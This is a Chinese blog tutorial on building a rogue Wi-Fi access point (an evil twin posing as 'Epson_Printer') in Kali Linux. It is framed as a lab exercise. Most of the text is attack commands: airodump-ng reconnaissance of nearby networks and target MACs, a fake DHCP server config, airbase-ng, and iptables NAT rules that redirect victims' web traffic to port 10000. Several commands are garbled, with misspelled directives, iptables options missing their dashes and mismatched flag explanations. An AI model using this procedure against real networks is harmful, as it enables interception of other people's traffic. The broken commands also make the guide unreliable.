无线安全

wifi钓鱼的入门知识

简介

该实验先是搭建一个测试环境,然后创建一个假的无线接入点

把网络连接连接到假的接入点并且强迫用户连接假的无线点

事先准备:

1.无线网卡:无线网卡用于数据包的嗅探和注入

2. Backtrack或者Kali Linux: 攻击平台

3.无线网络:确保该无线由用户使用,并且能控制这个无线接入点

4.一个目标机器:这个机器可以是你的物理机或者虚拟机

本次实验中用到的是Windows 7 虚拟机

开始实验:

创建一个流氓接入点

第一步:  启动虚拟机,选择kali linux 。点击”编辑虚拟机设置(Edit virtual machine settings)”

进入到“网络适配器(Network Adapter)”选项,在网络连接中选择“桥接(Bridged)”:

第二步:

开启kali 用root账户登录。

第三步:

连接笔记本的无线网卡,确保在Removable Devices选项下的无线网卡选项前面有一个蓝色的对钩

如果没有,需要选择无线网卡来让无线网卡从Windows系统中断开,连接到kali linux虚拟机,如下图所示:

第四步:

打开终端,输入如下命令检查IP地址和网关

在本例中,网关是192.168.0.1

第五步:

先是用以下命令列出所有网卡列表,如下图:

可以看到一个名字是wlan5的网卡,就是这个了。

第六步:

检查下用户附近的无线AP是否都可用,用如下命令,截图如下:

  1. airodump-ng wlan5

这个命令后将会开始捕捉数据包,并且把用户附近的访问点列出来

其中BSSID是无线AP的MAC地址,Channel代表频率。注意PWR列的值,越靠近的路由器这个值越小

第七步:

记下AP点的BSSID 和Channel的值。此外,还要记下目标设备的MAC地址。

在这个例子中,BISSID值是5E:F9:6A:29:28:18,Channel的值是2。目标机器的MAC地址是68:5D:43:7D:F7:E9

第八步:

我们必须建立一个假的DHCP服务器来提供一个假的AP接入点。在kali中执行以下命令就可以创建一个DHCP:

  1. apt-get install isc-dhcp-server

建立好后,修改DHCP配置文件,如下:

  1. leafpad /etc/dhcpd.conf
  2. authoraitative;
  3.  
  4. default-lease-time 600;
  5.  
  6. max-lease-time 7200;
  7.  
  8. subnet 192.168.1.0 netmask 255.255.255.0 {
  9.  
  10. option routers 192.168.1.1;
  11.  
  12. option subnet-mask 255.255.255.0;
  13.  
  14. option domain-name Epson_Printer”;
  15.  
  16. option domain-name-servers 192.168.1.1;
  17.  
  18. range 192.168.1.2 192.168.1.40;
  19.  
  20. }

保存并关闭配置文件。

对/etc/dhcpd/dhcpd.conf文件重复上述操作。

第九步:

打开终端,执行以下命令,创建一个ESSID名和受害者访问AP相似的AP接入点,例子中我们用“Epson_Printer”。

  1. airbase-ng Epson_Printer -2 wlan5

l e 是AP接入点的ESSID(MAC地址)

l c是无线网络的频率

l Wlan5是网卡名

现在,名叫“Epson_Printer”的新的AP接入点创建完成。

第十步:

现在,我们打开一个新的终端,开始监控这个钓鱼AP,执行如下命令:

  1. airodump-ng bssid 00:C0:CA:70:8F:25 -2 wlan 5

第十一步:

检查第五步的产生的窗口,新建的AP接入点应该是可以看见的:

第十二步:

现在,我们必须向网络提供这个假的无线AP。打开终端,依次输入如下命令:

  1. ·  ifconfig at0 192.168.1.1 netmask 255.255.255.0
  2.  
  3. ·  ifconfig at0 mtu 1400
  4.  
  5. ·  route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
  6.  
  7. ·  iptables flush
  8.  
  9. ·  iptables table nat flush
  10.  
  11. ·  iptables delete-chain
  12.  
  13. ·  iptables table nat delete-chain
  14.  
  15. ·  echo 1 > /proc/sys/net/ipv4/ip_forward
  16.  
  17. ·  iptables -t nat -A PREROUTING -p udp -j DNAT to 192.168.0.1(gateway)
  18.  
  19. ·  iptables -P FORWARD ACCEPT
  20.  
  21. ·  iptables append FORWARD in-interface at0 -j ACCEPT
  22.  
  23. ·  iptables table nat append POSTROUTING out-interface eth0 -j MASQUERADE
  24.  
  25. ·  iptables -t nat -A PREROUTING -p tcp destination-port 80 -j REDIRECT to-port 10000
  26.  
  27. ·  dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0
  28.  
  29. ·  /etc/init.d/isc-dhcp-server start

(0)

本文由 安全周 作者:SecJack 发表,转载请注明来源!

热评文章

发表评论